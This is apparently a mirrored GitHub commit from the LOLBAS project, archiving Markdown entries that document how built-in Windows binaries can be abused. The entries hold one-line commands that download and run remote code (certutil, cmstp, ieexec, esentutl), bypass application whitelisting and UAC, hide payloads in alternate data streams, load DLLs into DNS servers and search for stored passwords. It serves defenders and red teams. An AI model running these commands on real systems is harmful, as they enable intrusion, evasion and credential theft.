mirror of
				https://github.com/LOLBAS-Project/LOLBAS
				synced 2025-10-25 06:45:41 +02:00 
			
		
		
		
	Removed MD files, we only use the webportal from now on. All MD files moved to archive
This commit is contained in:
		
							
								
								
									
										18
									
								
								Archive-Old-Version/OSBinaries/Atbroker.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										18
									
								
								Archive-Old-Version/OSBinaries/Atbroker.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,18 @@ | ||||
| ## Atbroker.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| ATBroker.exe /start malware | ||||
| Start a registered Assistive Technology (AT). | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\Atbroker.exe | ||||
|   * C:\Windows\SysWOW64\Atbroker.exe | ||||
|     | ||||
| * Notes: Thanks to Adam - @hexacorn Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry. | ||||
|    | ||||
|     | ||||
							
								
								
									
										16
									
								
								Archive-Old-Version/OSBinaries/Bash.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										16
									
								
								Archive-Old-Version/OSBinaries/Bash.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,16 @@ | ||||
| ## Bash.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| bash.exe -c calc.exe | ||||
| Execute calc.exe. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   *  | ||||
|     | ||||
| * Full path:    | ||||
|   * ? | ||||
|     | ||||
| * Notes: Thanks to ?   | ||||
|     | ||||
							
								
								
									
										40
									
								
								Archive-Old-Version/OSBinaries/Bitsadmin.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										40
									
								
								Archive-Old-Version/OSBinaries/Bitsadmin.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,40 @@ | ||||
| ## Bitsadmin.exe | ||||
| * Functions: Execute, Download, Copy, Read ADS | ||||
| ``` | ||||
|  | ||||
| bitsadmin /create 1 | ||||
| bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe | ||||
| bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL | ||||
| bitsadmin /RESUME 1 | ||||
| bitsadmin /complete 1 | ||||
|  | ||||
|  | ||||
|  | ||||
|  | ||||
| Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. | ||||
|  | ||||
| bitsadmin /create 1 | ||||
| bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe | ||||
| bitsadmin /RESUME 1 | ||||
| bitsadmin /complete 1 | ||||
|  | ||||
| Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. | ||||
|  | ||||
| bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset | ||||
| One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. | ||||
|  | ||||
| bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset | ||||
| One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Slide 53 | ||||
|   * https://www.youtube.com/watch?v=_8xJaaQlpBo | ||||
|   * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\Windows\System32\bitsadmin.exe | ||||
|   * c:\Windows\SysWOW64\bitsadmin.exe | ||||
|     | ||||
| * Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
							
								
								
									
										26
									
								
								Archive-Old-Version/OSBinaries/Certutil.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										26
									
								
								Archive-Old-Version/OSBinaries/Certutil.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,26 @@ | ||||
| ## Certutil.exe | ||||
| * Functions: Download, Add ADS, Decode, Encode | ||||
| ``` | ||||
|  | ||||
| certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe | ||||
| Download and save 7zip to disk in the current folder. | ||||
|  | ||||
| certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | ||||
| Download and save a PS1 file to an Alternate Data Stream (ADS). | ||||
|  | ||||
| certutil -encode inputFileName encodedOutputFileName | ||||
| certutil -decode encodedInputFileName decodedOutputFileName | ||||
|  | ||||
| Commands to encode and decode a file using Base64. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/Moriarty_Meng/status/984380793383370752 | ||||
|   * https://twitter.com/mattifestation/status/620107926288515072 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\certutil.exe | ||||
|   * c:\windows\sysWOW64\certutil.exe | ||||
|     | ||||
| * Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016   | ||||
|     | ||||
							
								
								
									
										17
									
								
								Archive-Old-Version/OSBinaries/Cmdkey.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								Archive-Old-Version/OSBinaries/Cmdkey.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| ## Cmdkey.exe | ||||
| * Functions: Credentials | ||||
| ``` | ||||
|  | ||||
| cmdkey /list | ||||
| List cached credentials. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\cmdkey.exe | ||||
|   * c:\windows\sysWOW64\cmdkey.exe | ||||
|     | ||||
| * Notes:    | ||||
|     | ||||
							
								
								
									
										25
									
								
								Archive-Old-Version/OSBinaries/Cmstp.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										25
									
								
								Archive-Old-Version/OSBinaries/Cmstp.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,25 @@ | ||||
| ## Cmstp.exe | ||||
| * Functions: Execute, UACBypass | ||||
| ``` | ||||
|  | ||||
| cmstp.exe /ni /s c:\cmstp\CorpVPN.inf | ||||
| Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. | ||||
|  | ||||
| cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf | ||||
| Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/NickTyrer/status/958450014111633408 | ||||
|   * https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 | ||||
|   * https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e | ||||
|   * https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ | ||||
|   * https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 (UAC Bypass) | ||||
|   * https://github.com/hfiref0x/UACME | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\system32\cmstp.exe | ||||
|   * C:\Windows\sysWOW64\cmstp.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer   | ||||
|     | ||||
							
								
								
									
										20
									
								
								Archive-Old-Version/OSBinaries/Control.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										20
									
								
								Archive-Old-Version/OSBinaries/Control.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,20 @@ | ||||
| ## Control.exe | ||||
| * Functions: Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| control.exe c:\windows\tasks\file.txt:evil.dll | ||||
| Execute evil.dll which is stored in an Alternate Data Stream (ADS). | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ | ||||
|   * https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ | ||||
|   * https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ | ||||
|   * https://twitter.com/bohops/status/955659561008017409 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\system32\control.exe     | ||||
|   * C:\Windows\sysWOW64\control.exe      | ||||
|     | ||||
| * Notes: Thanks to Jimmy - @bohops   | ||||
|     | ||||
							
								
								
									
										21
									
								
								Archive-Old-Version/OSBinaries/Csc.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										21
									
								
								Archive-Old-Version/OSBinaries/Csc.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,21 @@ | ||||
| ## Csc.exe | ||||
| * Functions: Compile | ||||
| ``` | ||||
|  | ||||
| csc -out:My.exe File.cs | ||||
| Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. | ||||
|  | ||||
| csc -target:library File.cs | ||||
|  | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe | ||||
|   *  | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe | ||||
|     | ||||
| * Notes: Thanks to ?   | ||||
|     | ||||
							
								
								
									
										18
									
								
								Archive-Old-Version/OSBinaries/Cscript.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										18
									
								
								Archive-Old-Version/OSBinaries/Cscript.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,18 @@ | ||||
| ## Cscript.exe | ||||
| * Functions: Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| cscript c:\ads\file.txt:script.vbs | ||||
| Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\cscript.exe | ||||
|   * c:\windows\sysWOW64\cscript.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
							
								
								
									
										19
									
								
								Archive-Old-Version/OSBinaries/Dfsvc.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										19
									
								
								Archive-Old-Version/OSBinaries/Dfsvc.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,19 @@ | ||||
| ## Dfsvc.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Missing Example | ||||
|  | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe      | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe     | ||||
|   * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe     | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe     | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
							
								
								
									
										20
									
								
								Archive-Old-Version/OSBinaries/Diskshadow.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										20
									
								
								Archive-Old-Version/OSBinaries/Diskshadow.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,20 @@ | ||||
| ## Diskshadow.exe | ||||
| * Functions: Execute, Dump NTDS.dit | ||||
| ``` | ||||
|  | ||||
| diskshadow.exe /s c:\test\diskshadow.txt | ||||
| Execute commands using diskshadow.exe from a prepared diskshadow script. | ||||
|  | ||||
| diskshadow> exec calc.exe | ||||
| Execute a calc.exe using diskshadow.exe. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\diskshadow.exe | ||||
|   * c:\windows\sysWOW64\diskshadow.exe | ||||
|     | ||||
| * Notes: Thanks to Jimmy - @bohops   | ||||
|     | ||||
							
								
								
									
										26
									
								
								Archive-Old-Version/OSBinaries/Dnscmd.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										26
									
								
								Archive-Old-Version/OSBinaries/Dnscmd.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,26 @@ | ||||
| ## Dnscmd.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll | ||||
| Adds a specially crafted DLL as a plug-in of the DNS Service. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 | ||||
|   * https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html | ||||
|   * https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp | ||||
|   * https://twitter.com/Hexacorn/status/994000792628719618 | ||||
|   * http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Dnscmd.exe | ||||
|   * c:\windows\sysWOW64\Dnscmd.exe | ||||
|     | ||||
| * Notes: This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the refference links for DLL details. | ||||
| Thanks to Shay Ber - ?, | ||||
| Dimitrios Slamaris - @dim0x69, | ||||
| Nikhil SamratAshok, | ||||
| Mittal - @nikhil_mitt | ||||
|    | ||||
|     | ||||
							
								
								
									
										32
									
								
								Archive-Old-Version/OSBinaries/Esentutl.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										32
									
								
								Archive-Old-Version/OSBinaries/Esentutl.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,32 @@ | ||||
| ## Esentutl.exe | ||||
| * Functions: Copy, Download, Write ADS, Read ADS | ||||
| ``` | ||||
|  | ||||
| esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o | ||||
| Copies the source VBS file to the destination VBS file. | ||||
|  | ||||
| esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o | ||||
| Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. | ||||
|  | ||||
| esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o | ||||
| Copies the source Alternate Data Stream (ADS) to the destination EXE. | ||||
|  | ||||
| esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o | ||||
| Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file. | ||||
|  | ||||
| esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o | ||||
| Copies the source EXE to the destination EXE file. | ||||
|  | ||||
| esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o | ||||
| Copies the source EXE to the destination EXE file | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/egre55/status/985994639202283520 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\esentutl.exe | ||||
|   * c:\windows\sysWOW64\esentutl.exe | ||||
|     | ||||
| * Notes: Thanks to egre55 - @egre55   | ||||
|     | ||||
							
								
								
									
										24
									
								
								Archive-Old-Version/OSBinaries/Expand.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										24
									
								
								Archive-Old-Version/OSBinaries/Expand.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,24 @@ | ||||
| ## Expand.exe | ||||
| * Functions: Download, Copy, Add ADS | ||||
| ``` | ||||
|  | ||||
| expand \\webdav\folder\file.bat c:\ADS\file.bat | ||||
| Copies source file to destination. | ||||
|  | ||||
| expand c:\ADS\file1.bat c:\ADS\file2.bat | ||||
| Copies source file to destination. | ||||
|  | ||||
| expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat | ||||
| Copies source file to destination Alternate Data Stream (ADS). | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/infosecn1nja/status/986628482858807297 | ||||
|   * https://twitter.com/Oddvarmoe/status/986709068759949319 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Expand.exe | ||||
|   * c:\windows\sysWOW64\Expand.exe | ||||
|     | ||||
| * Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
							
								
								
									
										17
									
								
								Archive-Old-Version/OSBinaries/Explorer.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								Archive-Old-Version/OSBinaries/Explorer.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| ## Explorer.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| explorer.exe calc.exe | ||||
| Executes calc.exe as a subprocess of explorer.exe. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/bohops/status/986984122563391488 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\explorer.exe | ||||
|   * c:\windows\sysWOW64\explorer.exe | ||||
|     | ||||
| * Notes: Thanks to Jimmy - @bohops   | ||||
|     | ||||
							
								
								
									
										17
									
								
								Archive-Old-Version/OSBinaries/Extexport.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								Archive-Old-Version/OSBinaries/Extexport.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| ## Extexport.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Extexport.exe c:\test foo bar | ||||
| Load a DLL located in the c:\\test folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Program Files\Internet Explorer\Extexport.exe     | ||||
|   * C:\Program Files\Internet Explorer(x86)\Extexport.exe | ||||
|     | ||||
| * Notes: Thanks to Adam - @hexacorn   | ||||
|     | ||||
							
								
								
									
										25
									
								
								Archive-Old-Version/OSBinaries/Extrac32.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										25
									
								
								Archive-Old-Version/OSBinaries/Extrac32.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,25 @@ | ||||
| ## Extrac32.exe | ||||
| * Functions: Add ADS, Download | ||||
| ``` | ||||
|  | ||||
| extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | ||||
| Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. | ||||
|  | ||||
| extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe | ||||
| Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. | ||||
|  | ||||
| extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt | ||||
| Copy the source file to the destination file and overwrite it. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|   * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   * https://twitter.com/egre55/status/985994639202283520 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\extrac32.exe | ||||
|   * c:\windows\sysWOW64\extrac32.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55   | ||||
|     | ||||
							
								
								
									
										24
									
								
								Archive-Old-Version/OSBinaries/Findstr.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										24
									
								
								Archive-Old-Version/OSBinaries/Findstr.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,24 @@ | ||||
| ## Findstr.exe | ||||
| * Functions: Add ADS, Search | ||||
| ``` | ||||
|  | ||||
| findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe | ||||
| Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. | ||||
|  | ||||
| findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe | ||||
| Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. | ||||
|  | ||||
| findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml | ||||
| Search for stored password in Group Policy files stored on SYSVOL. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|   * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\findstr.exe | ||||
|   * c:\windows\sysWOW64\findstr.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
							
								
								
									
										22
									
								
								Archive-Old-Version/OSBinaries/Forfiles.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										22
									
								
								Archive-Old-Version/OSBinaries/Forfiles.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,22 @@ | ||||
| ## Forfiles.exe | ||||
| * Functions: Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | ||||
| Executes calc.exe since there is a match for notepad.exe in the c:\\windows\\System32 folder. | ||||
|  | ||||
| forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" | ||||
| Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/vector_sec/status/896049052642533376 | ||||
|   * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\system32\forfiles.exe | ||||
|   * C:\Windows\sysWOW64\forfiles.exe | ||||
|     | ||||
| * Notes: Thanks to Eric - @vector_sec, Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
							
								
								
									
										22
									
								
								Archive-Old-Version/OSBinaries/Gpscript.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										22
									
								
								Archive-Old-Version/OSBinaries/Gpscript.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,22 @@ | ||||
| ## Gpscript.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Gpscript /logon | ||||
| Executes logon scripts configured in Group Policy. | ||||
|  | ||||
| Gpscript /startup | ||||
| Executes startup scripts configured in Group Policy. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\gpscript.exe | ||||
|   * c:\windows\sysWOW64\gpscript.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
| Requires administrative rights and modifications to local group policy settings. | ||||
|    | ||||
|     | ||||
							
								
								
									
										17
									
								
								Archive-Old-Version/OSBinaries/IEExec.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								Archive-Old-Version/OSBinaries/IEExec.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| ## IEExec.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| ieexec.exe http://x.x.x.x:8080/bypass.exe | ||||
| Executes bypass.exe from the remote server. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\ieexec.exe | ||||
|   * c:\windows\sysWOW64\ieexec.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
							
								
								
									
										19
									
								
								Archive-Old-Version/OSBinaries/Ie4unit.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										19
									
								
								Archive-Old-Version/OSBinaries/Ie4unit.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,19 @@ | ||||
| ## Ie4unit.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| ie4unit.exe -BaseSettings | ||||
| Executes commands from a specially prepared ie4uinit.inf file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\ie4unit.exe     | ||||
|   * c:\windows\sysWOW64\ie4unit.exe     | ||||
|   * c:\windows\system32\ieuinit.inf     | ||||
|   * c:\windows\sysWOW64\ieuinit.inf     | ||||
|     | ||||
| * Notes: Thanks to Jimmy - @bohops   | ||||
|     | ||||
							
								
								
									
										19
									
								
								Archive-Old-Version/OSBinaries/InfDefaultInstall.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										19
									
								
								Archive-Old-Version/OSBinaries/InfDefaultInstall.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,19 @@ | ||||
| ## InfDefaultInstall.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| InfDefaultInstall.exe Infdefaultinstall.inf | ||||
| Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/KyleHanslovan/status/911997635455852544 | ||||
|   * https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a | ||||
|   * https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Infdefaultinstall.exe | ||||
|   * c:\windows\sysWOW64\Infdefaultinstall.exe | ||||
|     | ||||
| * Notes: Thanks to Kyle Hanslovan - @kylehanslovan   | ||||
|     | ||||
							
								
								
									
										24
									
								
								Archive-Old-Version/OSBinaries/InstallUtil.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										24
									
								
								Archive-Old-Version/OSBinaries/InstallUtil.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,24 @@ | ||||
| ## InstallUtil.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | ||||
| Execute the target .NET DLL or EXE. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ | ||||
|   * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 | ||||
|   * http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md | ||||
|   * https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ | ||||
|   * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe | ||||
